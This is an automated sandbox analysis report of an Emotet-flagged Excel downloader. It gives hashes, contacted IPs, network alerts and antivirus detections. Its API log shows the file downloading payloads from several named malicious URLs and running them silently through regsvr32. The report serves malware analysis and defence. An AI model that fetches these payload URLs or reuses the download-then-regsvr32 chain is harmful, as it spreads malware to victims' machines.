Summary | ZeroBOX

Documento.xls

Downloader MSOffice File
Category FILE
Machine s1_win7_x6403_us
Started March 8, 2023, 1:58 p.m.
Completed March 8, 2023, 2:01 p.m.
Size 255.0KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:19:34 2015, Last Saved Time/Date: Sun Nov 6 17:53:39 2022, Security: 0
MD5 893f9b10a48073fc3fa0d5c8867f7200
SHA256 1c5f2ca9839078742383b207721ce92fdfa70ac50e5d7b73c2488d47f7e5ebac
CRC32 925E90AC
ssdeep 6144:6Kpb8rGYrMPe3q7Q0XV5xtuEsi8/dgVNiwrfx9rNFMMrttRzV5Dz3UxqC8LUcST:5NbDjP9XH5XIqZLnST
Yara
  • Microsoft_Office_File_Downloader_Zero - Microsoft Office File Downloader
  • Microsoft_Office_File_Zero - Microsoft Office File

IP Address Status Action
103.237.169.99 Active Moloch
121.254.136.27 Active Moloch
152.228.216.255 Active Moloch
164.124.101.2 Active Moloch
208.87.225.118 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49167 -> 152.228.216.255:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)
TCP 192.168.56.103:49166 -> 152.228.216.255:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)
TCP 192.168.56.103:49162 -> 103.237.169.99:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)
TCP 152.228.216.255:443 -> 192.168.56.103:49168 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1 192.168.56.103:49162 -> 103.237.169.99:443 C=US, O=Let's Encrypt, CN=R3 CN=cs.com.sg 35:f9:b3:54:db:e1:bd:7b:fa:18:f4:fd:95:0b:18:ab:fd:d7:c0:c8

request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://clanbaker.org/css/khhl7kT2n69n/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1440
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c318000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1440
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6be02000
process_handle: 0xffffffff
1 0 0
cmdline C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx
cmdline C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx
cmdline C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx
cmdline C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1440
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef70000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: https://cs.com.sg/Backup/Bk778kXNKMiH5vH/
stack_pivoted: 0
filepath_r: ..\oxnv1.ooccxx
filepath: C:\Users\test22\oxnv1.ooccxx
2148270105 0

URLDownloadToFileW

url: https://j2ccamionmagasin.fr/css/1Mp8y/
stack_pivoted: 0
filepath_r: ..\oxnv2.ooccxx
filepath: C:\Users\test22\oxnv2.ooccxx
2148270085 0

URLDownloadToFileW

url: http://atici.net/old/PkZI74DD/
stack_pivoted: 0
filepath_r: ..\oxnv3.ooccxx
filepath: C:\Users\test22\oxnv3.ooccxx
2148270085 0

URLDownloadToFileW

url: http://clanbaker.org/css/khhl7kT2n69n/
stack_pivoted: 0
filepath_r: ..\oxnv4.ooccxx
filepath: C:\Users\test22\oxnv4.ooccxx
2148270086 0
parent_process excel.exe martian_process C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx
parent_process excel.exe martian_process C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx
parent_process excel.exe martian_process C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx
parent_process excel.exe martian_process C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx
Antivirus

Lionic Trojan.MSExcel.Emotet.4!c
MicroWorld-eScan XLM.Formulas.Abracadabra.8.Gen
ClamAV Xls.Downloader.Emotet-b649c93692b4c9d9-9976616-0
FireEye XLM.Formulas.Abracadabra.8.Gen
CAT-QuickHeal Trojan.XLM4.Emotet.47213
McAfee W97M/Downloader.dwl
VIPRE XLM.Formulas.Abracadabra.8.Gen
Sangfor Malware.Generic-XLM.Save.Emotet_ma29
K7AntiVirus Trojan ( 0059086a1 )
K7GW Trojan ( 0059086a1 )
Arcabit XLM.Formulas.Abracadabra.8.Gen
VirIT X97M.Emotet.DMG
Cyren XF/Emotet.E.gen!Eldorado
Symantec CL.Suspexec!gen128
ESET-NOD32 DOC/TrojanDownloader.Agent.DOV
TrendMicro-HouseCall Trojan.XF.EMOTET.YJCKH
Avast VBS:Malware-gen
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.MSOffice.Generic
BitDefender XLM.Formulas.Abracadabra.8.Gen
Tencent Trojan.MsOffice.Macro40.11025283
Sophos Troj/DocDl-AGRX
F-Secure Malware.XF/Agent.B2
DrWeb Exploit.Siggen3.38056
TrendMicro Trojan.XF.EMOTET.YJCKH
McAfee-GW-Edition W97M/Downloader.dwl
Emsisoft XLM.Formulas.Abracadabra.8.Gen (B)
Avira XF/Agent.B2
Antiy-AVL Trojan[Downloader]/MSExcel.Agent.dov
Microsoft Trojan:O97M/Emotet.SM!MTB
ViRobot X97M.S.Downloader.261120.B
ZoneAlarm HEUR:Trojan.MSOffice.Generic
GData Macro.Trojan-Downloader.EmoAgent.A
Google Detected
AhnLab-V3 Downloader/XLS.XlmMacro.S1947
ALYac Trojan.Downloader.XLS.Gen
MAX malware (ai score=100)
VBA32 TrojanDownloader.O97M.Emotet.DD
Zoner Probably Heur.W97ShellB
Rising Downloader.Agent/XLM!1.DE99 (CLASSIC)
Ikarus Trojan-Downloader.XLM.Agent
Fortinet MSExcel/Agent.DKF!tr.dldr
AVG VBS:Malware-gen